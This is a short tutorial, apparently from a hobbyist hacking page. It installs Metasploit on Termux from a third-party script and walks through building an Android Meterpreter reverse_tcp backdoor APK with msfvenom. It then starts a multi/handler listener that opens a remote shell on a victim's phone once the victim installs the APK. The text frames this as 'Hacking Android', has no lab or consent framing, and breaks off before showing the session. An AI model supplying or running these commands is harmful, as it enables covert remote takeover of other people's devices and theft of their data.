Hacking With Metasploit 

To install Metasploit on Termux type below commands :
====================
apt-get install git
git clone https://github.com/verluchie/termux-metasploit 
cd termux-metasploit 
chmod 777 install.sh 
And Then Install it 
sh install.sh 
====================
After installed run from your terminal
msfconsole
====================
After this installation type msfconsole to run Metasploit

Hacking Android

Open Termux 
and type below commands  and see the Explanation too.
====================
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Let me explain the above Command so we are using msfvenom as the exploit generator for an android using Meterpreter for the reverse connection to the attacker’s system. LHOST defines the attackers IP address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable.
Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.
So now we need to set up a handler to handle incoming connections to the port let’s do it.

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <attacker_system_ip>
set lport 4444
exploit 
==========================

Remember that the LHOST & LPORT are going to be the attacker IP address and port to listen to the reverse connection. and exploit to start listening.
Now as soon as the attacker installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this.